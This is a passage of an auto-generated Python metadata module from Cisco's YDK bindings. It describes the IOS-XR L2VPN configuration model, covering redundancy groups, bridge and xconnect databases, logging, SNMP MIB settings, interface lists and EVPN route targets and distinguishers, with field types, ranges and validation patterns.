'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
''' List of G8032 Ring
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable flow load balancing on l2vpn bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVI Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
''' whether RT is Stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
